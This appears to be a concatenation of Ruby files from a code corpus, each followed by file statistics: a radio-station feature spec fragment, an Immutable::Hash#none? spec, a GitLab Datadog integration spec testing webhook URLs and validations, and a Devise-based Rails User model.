have_text "New Station" fill_in "Name", with: "fm4" fill_in "Url", with: "https://planetrock.co.uk" fill_in "Playlist url", with: "https://onlineradiobox.com/uk/planetrock/playlist" select "radiobox", from: "Strategy" click_on "Save" expect(page).to have_content "Station was successfully created." expect(page).to have_table_with_exact_data([ ["Name", "Type", "Active", "Created", "Last update", "tracks last 24h", "all tracks", ""], ["fm4", "radiobox", "true", Time.current.strftime("%d.%m.%Y"), "", "0", "0", "Edit Show"] ]) end end
31.633333
99
0.630664
87fbc932d63c5088296485f366a16c23f90bd4af
1,271
require 'spec_helper' describe Immutable::Hash do describe '#none?' do context 'when empty' do it 'with a block returns true' do H.empty.none? {}.should == true end it 'with no block returns true' do H.empty.none?.should == true end end context 'when not empty' do let(:hash) { H['A' => 'aye', 'B' => 'bee', 'C' => 'see', nil => 'NIL'] } context 'with a block' do [ %w[A aye], %w[B bee], %w[C see], [nil, 'NIL'], ].each do |pair| it "returns false if the block ever returns true (#{pair.inspect})" do hash.none? { |key, value| key == pair.first && value == pair.last }.should == false end it 'returns true if the block always returns false' do hash.none? { |key, value| key == 'D' && value == 'dee' }.should == true end it 'stops iterating as soon as the block returns true' do yielded = [] hash.none? { |k,v| yielded << k; true } yielded.size.should == 1 end end end context 'with no block' do it 'returns false' do hash.none?.should == false end end end end end
25.938776
95
0.497246
e2749ab1bc11c6b6cc70eda0347f2c5fc2aba9bf
5,668
# frozen_string_literal: true require 'securerandom' require 'spec_helper' RSpec.describe Integrations::Datadog do let_it_be(:project) { create(:project) } let_it_be(:pipeline) { create(:ci_pipeline, project: project) } let_it_be(:build) { create(:ci_build, project: project) } let(:active) { true } let(:dd_site) { 'datadoghq.com' } let(:default_url) { 'https://webhooks-http-intake.logs.datadoghq.com/api/v2/webhook' } let(:api_url) { '' } let(:api_key) { SecureRandom.hex(32) } let(:dd_env) { 'ci' } let(:dd_service) { 'awesome-gitlab' } let(:expected_hook_url) { default_url + "?dd-api-key=#{api_key}&env=#{dd_env}&service=#{dd_service}" } let(:instance) do described_class.new( active: active, project: project, datadog_site: dd_site, api_url: api_url, api_key: api_key, datadog_env: dd_env, datadog_service: dd_service ) end let(:saved_instance) do instance.save! instance end let(:pipeline_data) { Gitlab::DataBuilder::Pipeline.build(pipeline) } let(:build_data) { Gitlab::DataBuilder::Build.build(build) } it_behaves_like Integrations::HasWebHook do let(:integration) { instance } let(:hook_url) { "#{described_class::URL_TEMPLATE % { datadog_domain: dd_site }}?dd-api-key=#{api_key}&env=#{dd_env}&service=#{dd_service}" } end describe 'validations' do subject { instance } context 'when service is active' do let(:active) { true } it { is_expected.to validate_presence_of(:api_key) } it { is_expected.to allow_value(api_key).for(:api_key) } it { is_expected.not_to allow_value('87dab2403c9d462 87aec4d9214edb1e').for(:api_key) } it { is_expected.not_to allow_value('................................').for(:api_key) } context 'when selecting site' do let(:dd_site) { 'datadoghq.com' } let(:api_url) { '' } it { is_expected.to validate_presence_of(:datadog_site) } it { is_expected.not_to validate_presence_of(:api_url) } it { is_expected.not_to allow_value('datadog hq.com').for(:datadog_site) } end context 'with custom api_url' do let(:dd_site) { '' } let(:api_url) { 'https://webhooks-http-intake.logs.datad0g.com/api/v2/webhook' } it { is_expected.not_to validate_presence_of(:datadog_site) } it { is_expected.to validate_presence_of(:api_url) } it { is_expected.to allow_value(api_url).for(:api_url) } it { is_expected.not_to allow_value('example.com').for(:api_url) } end context 'when missing site and api_url' do let(:dd_site) { '' } let(:api_url) { '' } it { is_expected.not_to be_valid } it { is_expected.to validate_presence_of(:datadog_site) } it { is_expected.to validate_presence_of(:api_url) } end context 'when providing both site and api_url' do let(:dd_site) { 'datadoghq.com' } let(:api_url) { default_url } it { is_expected.not_to allow_value('datadog hq.com').for(:datadog_site) } it { is_expected.not_to allow_value('example.com').for(:api_url) } end end context 'when integration is not active' do let(:active) { false } it { is_expected.to be_valid } it { is_expected.not_to validate_presence_of(:api_key) } end end describe '#hook_url' do subject { instance.hook_url } context 'with standard site URL' do it { is_expected.to eq(expected_hook_url) } end context 'with custom URL' do let(:api_url) { 'https://webhooks-http-intake.logs.datad0g.com/api/v2/webhook' } it { is_expected.to eq(api_url + "?dd-api-key=#{api_key}&env=#{dd_env}&service=#{dd_service}") } context 'blank' do let(:api_url) { '' } it { is_expected.to eq(expected_hook_url) } end end context 'without optional params' do let(:dd_service) { '' } let(:dd_env) { '' } it { is_expected.to eq(default_url + "?dd-api-key=#{api_key}") } end end describe '#api_keys_url' do subject { instance.api_keys_url } it { is_expected.to eq("https://app.#{dd_site}/account/settings#api") } context 'with unset datadog_site' do let(:dd_site) { '' } it { is_expected.to eq("https://docs.datadoghq.com/account_management/api-app-keys/") } end end describe '#test' do context 'when request is succesful' do subject { saved_instance.test(pipeline_data) } before do stub_request(:post, expected_hook_url).to_return(body: 'OK') end it { is_expected.to eq({ success: true, result: 'OK' }) } end context 'when request fails' do subject { saved_instance.test(pipeline_data) } before do stub_request(:post, expected_hook_url).to_return(body: 'CRASH!!!', status: 500) end it { is_expected.to eq({ success: false, result: 'CRASH!!!' }) } end end describe '#execute' do before do stub_request(:post, expected_hook_url) saved_instance.execute(data) end context 'with pipeline data' do let(:data) { pipeline_data } let(:expected_headers) do { WebHookService::GITLAB_EVENT_HEADER => 'Pipeline Hook' } end it { expect(a_request(:post, expected_hook_url).with(headers: expected_headers)).to have_been_made } end context 'with job data' do let(:data) { build_data } let(:expected_headers) do { WebHookService::GITLAB_EVENT_HEADER => 'Job Hook' } end it { expect(a_request(:post, expected_hook_url).with(headers: expected_headers)).to have_been_made } end end end
30.473118
145
0.642202
bfabbbbafb14c4684bb46d3d2cc39375e23bee46
594
class User < ApplicationRecord # Include default devise modules. Others available are: # :confirmable, :lockable, :timeoutable, :trackable and :omniauthable devise :database_authenticatable, :registerable, :recoverable, :rememberable, :validatable #ユーザ一人につき、ダイアリーもひとつ。 has_many :diaries, dependent: :destroy has_many :genres, dependent: :destroy has_many :likes, dependent: :destroy has_many :parises, dependent: :destroy has_many :liked_parises, through: :likes, source: :parise def already_liked?(parise) self.likes.exists?(parise_id: parise.id) end end
31.263158
71
0.747475